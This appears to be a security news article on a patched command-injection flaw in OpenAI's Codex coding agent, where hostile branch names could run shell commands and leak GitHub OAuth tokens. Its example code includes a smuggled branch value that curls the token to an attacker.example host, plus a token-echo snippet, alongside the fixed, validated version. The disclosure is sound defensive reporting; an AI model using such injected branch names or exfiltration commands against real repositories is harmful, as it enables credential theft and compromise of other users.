Phantom Labs, the research arm of identity security company BeyondTrust, has disclosed a command-injection vulnerability in OpenAI’s Codex coding agent that could expose GitHub OAuth tokens used for repository access. OpenAI has since patched the flaw with improved input validation, shell escaping, and tighter token scoping.
The vulnerability exploited the way Codex processes branch names during task creation. Codex runs automated coding tasks — code generation, reviews, pull requests — inside managed container environments that clone repositories and authenticate using short-lived GitHub OAuth tokens. By manipulating the branch name parameter, an attacker could inject arbitrary shell commands during environment setup, according to SiliconANGLE, which reported the disclosure on March 30.
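Neither OpenAI nor Phantom Labs has published the vulnerable code, but the class of bug is well understood. A minimal sketch, assuming a setup step that interpolates the user-supplied branch name directly into a shell command string (the function and repository names here are illustrative, not from the disclosure):

```python
def build_clone_command_unsafe(repo_url: str, branch: str) -> str:
    # VULNERABLE: the branch name is interpolated into a shell string,
    # so any shell metacharacters it contains become part of the command.
    return f"git clone --branch {branch} {repo_url} workspace"

# A hypothetical malicious branch name smuggles in a second command.
# When the resulting string is run with a shell (e.g. shell=True),
# everything after the ';' executes as its own command.
evil_branch = "main; curl https://attacker.example/?t=$GITHUB_TOKEN"
cmd = build_clone_command_unsafe("https://github.com/org/repo.git", evil_branch)
```

Because branch names are attacker-controllable content, any shell that evaluates the resulting string will run the injected command with the container's privileges.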
How the Attack Works
The Phantom Labs researchers demonstrated that the injected commands could extract the GitHub OAuth token and expose it through task outputs or external network requests. With a stolen token, an attacker could move laterally within GitHub — particularly dangerous in enterprise environments where Codex holds broad permissions across multiple repositories and workflows.
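The exfiltration step needs nothing exotic: if the token lives in the container's environment, an injected command only has to echo it into output the attacker can see. A sketch of that mechanism, using an assumed environment-variable name and a placeholder value (the real credential plumbing is not public):

```python
import os
import subprocess

# Assumed variable name and a placeholder value, purely for illustration.
os.environ["GITHUB_TOKEN"] = "ghs_example_not_real"

# An injected command running inside the container can read the token and
# write it to stdout, so anything that surfaces task output (logs, PR
# comments) or reaches the network leaks the credential.
leaked = subprocess.run(
    ["sh", "-c", "echo leaked=$GITHUB_TOKEN"],
    capture_output=True,
    text=True,
).stdout.strip()
```

The same shell expansion that makes `$GITHUB_TOKEN` convenient for legitimate setup scripts makes it trivially readable to any command an attacker manages to inject alongside them.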
The flaw extended beyond Codex’s web interface. Phantom Labs confirmed the attack vector also worked through the CLI, SDK, and IDE integrations, where locally stored authentication credentials could be used to reproduce the exploit via backend APIs, as SiliconANGLE reported.
More concerning: the vulnerability could scale. By embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project, turning a single poisoned branch into a multi-user attack surface.
Timing and Context
The disclosure arrives days after OpenAI shipped plugin support for Codex in version 0.117.0 on March 26, adding a searchable plugin directory, MCP server integrations, and shareable skills bundles. That expansion gives Codex access to external services including GitHub, Gmail, Google Drive, Cloudflare, and Vercel — each new integration representing an additional credential surface.
This is the pattern the agent security community has been flagging for months: every capability an AI agent gains is a potential new entry point. Codex passing branch names, unsanitized, into shell commands is a textbook case of an agent execution environment being treated as trusted internal plumbing when it needs the same hardening as any application handling untrusted input.
“AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources,” the Phantom Labs report states. “When user-controllable input is passed unsanitized into shell commands, the result is command injection with real consequences: token theft, organizational compromise and automated exploitation at scale.”
What OpenAI Fixed
OpenAI addressed the vulnerability through coordinated fixes that included improved input validation on branch name parameters, stronger shell escaping protections, tighter controls around token exposure within container environments, and additional measures to limit token scope and lifetime during task execution, according to SiliconANGLE’s reporting.
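OpenAI's actual patch is not public, but the first two fixes it describes, input validation and shell escaping, follow a standard pattern. A sketch under assumptions (the regex policy and function names are illustrative, not OpenAI's code):

```python
import re
import shlex
import subprocess

# Conservative allow-list loosely modeled on git's ref-name rules;
# an assumed policy, not OpenAI's actual validation logic.
BRANCH_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]*")

def clone_branch(repo_url: str, branch: str) -> None:
    if not BRANCH_RE.fullmatch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    # An argv list (no shell=True) passes the branch as a single argument;
    # no shell ever parses it, so metacharacters are inert.
    subprocess.run(
        ["git", "clone", "--branch", branch, "--single-branch",
         repo_url, "workspace"],
        check=True,
    )

def quote_for_shell(value: str) -> str:
    # Fallback when a shell string is unavoidable: escape explicitly
    # rather than interpolating raw input.
    return shlex.quote(value)
```

Validation rejects hostile names outright, and the argv-list call removes the shell from the path entirely; the remaining fixes in the patch (scoped, short-lived tokens) limit the blast radius if something still leaks.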
For enterprise teams running Codex with broad repository access, the fix is necessary, but the underlying lesson is structural: AI agents that clone repos, authenticate to services, and execute code in containers need the same input sanitization rigor as any production application handling untrusted data. The branch name field is user-controllable. Treating it otherwise was the vulnerability.